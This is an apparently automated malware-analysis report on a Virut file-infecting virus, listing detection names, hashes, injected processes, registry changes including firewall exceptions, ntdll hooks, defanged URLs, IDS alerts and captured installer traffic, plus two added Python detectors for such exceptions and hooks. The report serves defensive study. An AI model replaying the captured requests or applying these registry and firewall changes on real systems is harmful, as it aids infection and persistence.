Virus.Win32.Virut_7874a076b2
GenPack:Win32.Virtob.Gen.12 (BitDefender), Virus:Win32/Virut.BN (Microsoft), HEUR:Virus.Win32.Generic (Kaspersky), Trojan.Packed.1895 (DrWeb), GenPack:Win32.Virtob.Gen.12 (B) (Emsisoft), Artemis!7874A076B2F0 (McAfee), Trojan.Gen.6 (Symantec), Virus.Win32.Virut (Ikarus), GenPack:Win32.Virtob.Gen.12 (FSecure), Win32:Patched-AFV [Trj] (AVG), Win32:Patched-AFV [Trj] (Avast), PE_VIRUX.GEN2-1 (TrendMicro), mzpefinder_pcap_file.YR, GenericIRCBot.YR, VirusVirut.YR (Lavasoft MAS)
Behaviour: Trojan, Virus, Packed, IRCBot
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 7874a076b2f09a3f7969b819cb4955e0
SHA1: fb20c513c9f92df43ac78088a46be53fd5dcea2e
SHA256: 7d35b9627560ba66d74da27bae143d1ff28507fb612afe27efdf29f67dc39e22
SSDeep: 1536:Nyj1MDNF0 YgNr adMGRtOh3RUn70ClN3XqeCgtBMps:Ej1aNS YgdLdMGRABUlNHqeCUBM2
Size: 70144 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2001-10-01 03:36:15
Analyzed on: Windows7 SP1 32-bit
Summary:
Virus. A program that recursively replicates a possibly evolved copy of itself.
Payload
| Behaviour | Description |
|---|---|
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
Process activity
The Virus creates the following process(es):
INJ8027.tmp:3744
VRT7944.tmp:3276
VRT903E.tmp:2244
The Virus injects its code into the following process(es):
INJ98A6.tmp:2368
%original file name%.exe:3788
Explorer.EXE:520
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process INJ8027.tmp:3744 makes changes in the file system.
The Virus creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\appImg[1].jpg (4 bytes)
The process %original file name%.exe:3788 makes changes in the file system.
The Virus creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\nvlinfad[1] (630 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\Default[1] (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\toccolor[1] (522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\icw[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\icwhd2[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\icw[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\hm_globe[1] (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\linefade_hrz[1] (85 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\arrow_dwn[1] (49 bytes)
The process VRT7944.tmp:3276 makes changes in the file system.
The Virus creates and/or writes to the following file(s):
C:\Windows\Temp\INJ8027.tmp (1 bytes)
The process VRT903E.tmp:2244 makes changes in the file system.
The Virus creates and/or writes to the following file(s):
C:\Windows\Temp\INJ98A6.tmp (1 bytes)
Registry activity
The process INJ98A6.tmp:2368 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "60 45 15 8F 61 EE D2 01"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "60 45 15 8F 61 EE D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 39 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ98A6_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Virus deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process INJ8027.tmp:3744 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "60 B6 17 8F 61 EE D2 01"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1498459403"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "INJ8027.tmp"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "60 B6 17 8F 61 EE D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3A 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\INJ8027_RASMANCS]
"FileDirectory" = "%windir%\tracing"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Virus deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process %original file name%.exe:3788 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1001896575"
[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\7874a076b2f09a3f7969b819cb4955e0_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Virus deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process VRT7944.tmp:3276 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
Adds a Windows Firewall exception that allows any network activity for the program:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%WinDir%\temp]
"INJ8027.tmp" = "C:\Windows\TEMP\INJ8027.tmp:*:enabled:@shell32.dll,-1"
The process VRT903E.tmp:2244 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
Adds a Windows Firewall exception that allows any network activity for the program:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%WinDir%\temp]
"INJ98A6.tmp" = "C:\Windows\TEMP\INJ98A6.tmp:*:enabled:@shell32.dll,-1"
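Both values above use the legacy AuthorizedApplications\List format path:scope:state:display-name, where a scope of * means any remote address. The Python below is an added example, not part of the Lavasoft report: it parses values in that format and flags the traits the two entries share (a .tmp file under C:\Windows\TEMP, the placeholder display name @shell32.dll,-1, scope *). The sample dictionary holds the report's two entries plus a constructed benign entry for contrast; reading the live key is described after the block.

```python
import os

# Constructed sample of the legacy AuthorizedApplications\List values. The two
# INJ*.tmp entries are the ones the report shows; the third is a made-up benign
# entry included for contrast.
SAMPLE_AUTHORIZED_APPS = {
    r"C:\Windows\TEMP\INJ8027.tmp": r"C:\Windows\TEMP\INJ8027.tmp:*:enabled:@shell32.dll,-1",
    r"C:\Windows\TEMP\INJ98A6.tmp": r"C:\Windows\TEMP\INJ98A6.tmp:*:enabled:@shell32.dll,-1",
    r"C:\Program Files\Example\app.exe": r"C:\Program Files\Example\app.exe:*:Enabled:Example App",
}

# Locations and extensions a legitimate firewall exception should almost never name.
SCRATCH_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\users\\public\\")
SCRATCH_EXTS = (".tmp", ".dat", ".bin")
PLACEHOLDER_NAME = "@shell32.dll,-1"


def parse_authorized_app(value):
    """Split a 'path:scope:state:display-name' value.

    The path carries its own ':' after the drive letter, so split from the right;
    this assumes the display name contains no ':' (true for the report's entries).
    """
    parts = value.rsplit(":", 3)
    if len(parts) != 4:
        raise ValueError("not a path:scope:state:name value: %r" % value)
    path, scope, state, name = parts
    return {
        "path": path,
        "scope": scope,  # '*' = any remote address
        "enabled": state.lower() == "enabled",
        "name": name,
    }


def indicators(rule):
    """Reasons a parsed rule looks like a malware-added exception (empty if none)."""
    reasons = []
    low = rule["path"].lower()
    if any(d in low for d in SCRATCH_DIRS):
        reasons.append("path in scratch directory")
    if os.path.splitext(low)[1] in SCRATCH_EXTS:
        reasons.append("non-executable extension")
    if rule["name"] == PLACEHOLDER_NAME:
        reasons.append("placeholder display name")
    if reasons and rule["scope"] == "*":
        reasons.append("open to any remote address")
    return reasons


def find_suspicious(authorized_apps):
    """Path -> reasons for every enabled rule with at least one indicator."""
    hits = {}
    for value in authorized_apps.values():
        rule = parse_authorized_app(value)
        reasons = indicators(rule)
        if rule["enabled"] and reasons:
            hits[rule["path"]] = reasons
    return hits


if __name__ == "__main__":
    for path, reasons in find_suspicious(SAMPLE_AUTHORIZED_APPS).items():
        print(path, "->", ", ".join(reasons))
```

On a live Windows 7 host the same dictionary is built with winreg.OpenKey on HKEY_LOCAL_MACHINE and the key path System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, iterating winreg.EnumValue; the DomainProfile subtree has the same layout and should be checked too.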
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Virus installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
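The hooks listed above are inline user-mode hooks: the first bytes of each ntdll stub are overwritten with a transfer of control into the virus's code (in ntdll the Nt* and Zw* exports resolve to the same stub, so the list names seven distinct functions, covering file open/create and process creation). One way to check for them is to compare each stub's prologue in the live process against the clean pattern, or against the same export read from ntdll.dll on disk. The Python below is an added example, not code from the report or from the sample: the stub layouts for Windows 7 x86 and x64 are real, but the syscall numbers and the hooked bytes in the sample are constructed, and reading the bytes from a live process (for example ReadProcessMemory via ctypes) is left outside the block.

```python
import struct

# Clean Windows 7 ntdll syscall stub prologues (real layouts):
#   x86: B8 <imm32>          mov eax, <syscall number>
#        BA 00 03 FE 7F      mov edx, 7FFE0300h   (KUSER_SHARED_DATA.SystemCall)
#        FF 12               call [edx]
#   x64: 4C 8B D1            mov r10, rcx
#        B8 <imm32>          mov eax, <syscall number>
X86_SYSCALL_TAIL = b"\xBA\x00\x03\xFE\x7F\xFF\x12"
X64_PROLOGUE = b"\x4C\x8B\xD1\xB8"

# First bytes an inline hook typically leaves at the start of a stub.
HOOK_PATTERNS = (
    (b"\xE9", "jmp rel32"),
    (b"\xE8", "call rel32"),
    (b"\xEB", "jmp rel8"),
    (b"\xFF\x25", "jmp [mem]"),
    (b"\x68", "push imm32 / ret"),
    (b"\xCC", "int3"),
)


def classify_stub(prologue, bits=32):
    """Return ('clean', syscall_no), ('hooked', kind) or ('unknown', hex) for a stub's first bytes."""
    if bits == 32 and prologue[:1] == b"\xB8" and prologue[5:12] == X86_SYSCALL_TAIL:
        return ("clean", struct.unpack_from("<I", prologue, 1)[0])
    if bits == 64 and prologue[:4] == X64_PROLOGUE:
        return ("clean", struct.unpack_from("<I", prologue, 4)[0])
    for pattern, kind in HOOK_PATTERNS:
        if prologue.startswith(pattern):
            if pattern == b"\x68" and prologue[5:6] != b"\xC3":
                continue  # a lone push is not the push/ret trampoline
            return ("hooked", kind)
    return ("unknown", prologue[:8].hex())


def find_hooks(memory_stubs, disk_stubs, bits=32):
    """Name -> reason for every export whose in-memory prologue is hooked or differs from disk."""
    hooked = {}
    for name, mem in memory_stubs.items():
        verdict, detail = classify_stub(mem, bits)
        if verdict == "hooked":
            hooked[name] = detail
        elif name in disk_stubs and mem[:8] != disk_stubs[name][:8]:
            hooked[name] = "differs from disk: " + mem[:8].hex()
    return hooked


def clean_x86_stub(syscall_no):
    """Build a clean x86 stub for the constructed sample (ret 2Ch = 11 stack args)."""
    return b"\xB8" + struct.pack("<I", syscall_no) + X86_SYSCALL_TAIL + b"\xC2\x2C\x00"


# Constructed sample for three of the exports the report lists. Syscall numbers are
# illustrative, and the hooked bytes are what a jmp rel32 and a push/ret trampoline
# would leave behind; a real check reads these bytes from the live process and from
# a fresh mapping of ntdll.dll on disk.
DISK_STUBS = {
    "NtCreateFile": clean_x86_stub(0x42),
    "NtCreateProcess": clean_x86_stub(0x4F),
    "NtQueryInformationProcess": clean_x86_stub(0xEA),
}
MEMORY_STUBS = {
    "NtCreateFile": b"\xE9\x10\x20\x30\x00" + DISK_STUBS["NtCreateFile"][5:],
    "NtCreateProcess": b"\x68\x00\x00\x0A\x00\xC3" + DISK_STUBS["NtCreateProcess"][6:],
    "NtQueryInformationProcess": DISK_STUBS["NtQueryInformationProcess"],
}

if __name__ == "__main__":
    for name, reason in find_hooks(MEMORY_STUBS, DISK_STUBS).items():
        print(name, "->", reason)
```

The pattern check alone catches the common trampolines; the disk comparison is what catches a hook that the pattern table does not know, so run both and treat a mismatch in the first bytes of any Nt*/Zw* export as a hook until proven otherwise.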
Propagation
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2600.0000
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: icwtutor.exe
Internal Name: icwtutor
File Version: 6.00.2600.0000 (xpclient.010817-1148)
File Description: Internet Connection Wizard
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| . | 4096 | 106496 | 64000 | 5.54309 | baa533c55d7fce8e5763b19ad2c71ab8 |
| . | 110592 | 3189 | 3584 | 3.90247 | f9e71b81c71bd620d9d8885d224266ca |
| . | 114688 | 1696 | 2048 | 2.04695 | 2f316b27644023f1b96711d5ba588239 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 | |
| hxxp://way.doorcrayon.bid/aff_c?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 | |
| hxxp://fun.losscook.bid/offer.php?affId=3226&trackingId=244218551&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 | |
| hxxp://fun.losscook.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 | |
| hxxp://door.suitworm.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 | |
| dns.msftncsi.com | |
| jhampt.com | |
| teredo.ipv6.microsoft.com | |
| uuacla.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Windows executable sent when remote host claims to send an image 2
ET POLICY Suspicious Windows Executable WriteProcessMemory
ET TROJAN Backdoor User-Agent (InstallCapital)
Traffic
POST hXXp://fun.losscook.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: fun.losscook.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 362
cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=3970&id[]=3971&id[]=3972&id[]=3973&id[]=3974&id[]=3975&id[]=3954&id[]=3955&id[]=3956&id[]=3957&id[]=3958&id[]=3959&id[]=3960&id[]=3961&id[]=3193&id[]=3704&id[]=3706&id[]=3711&id[]=3712&id[]=3713&id[]=3985&id[]=3986&id[]=3987&id[]=3988&id[]=3989&id[]=3946&id[]=3947&id[]=3948&id[]=3949&id[]=3950&id[]=3951&id[]=3952
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Mon, 26 Jun 2017 09:49:46 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 ec6662ba477736a13086dd664a1145be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TnDuVvitYh9_KcubeimTbDal-46zcinlVNrqHtGYIR3JgrHMbYBzQQ==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: TnDuVvitYh9_KcubeimTbDal-46zcinlVNrqHtGYIR3JgrHMbYBzQQ==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
POST hXXp://door.suitworm.bid/installer.php?affId=3226&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&trackingId=244218551&cc=UA&untracked=&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: door.suitworm.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 362
cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=3970&id[]=3971&id[]=3972&id[]=3973&id[]=3974&id[]=3975&id[]=3954&id[]=3955&id[]=3956&id[]=3957&id[]=3958&id[]=3959&id[]=3960&id[]=3961&id[]=3193&id[]=3704&id[]=3706&id[]=3711&id[]=3712&id[]=3713&id[]=3985&id[]=3986&id[]=3987&id[]=3988&id[]=3989&id[]=3946&id[]=3947&id[]=3948&id[]=3949&id[]=3950&id[]=3951&id[]=3952
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Mon, 26 Jun 2017 09:49:33 GMT
Connection: close
Content-Length: 41720
<<< 41720-byte binary body (served as Content-Type: text/html) skipped >>>
GET hXXp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: fun.losscook.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 643
Connection: close
Location: hXXp://way.doorcrayon.bid/aff_c?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Mon, 26 Jun 2017 09:49:30 GMT
X-Cache: Miss from cloudfront
Via: 1.1 4ba0e9deb9465045a3261b8712935964.cloudfront.net (CloudFront)
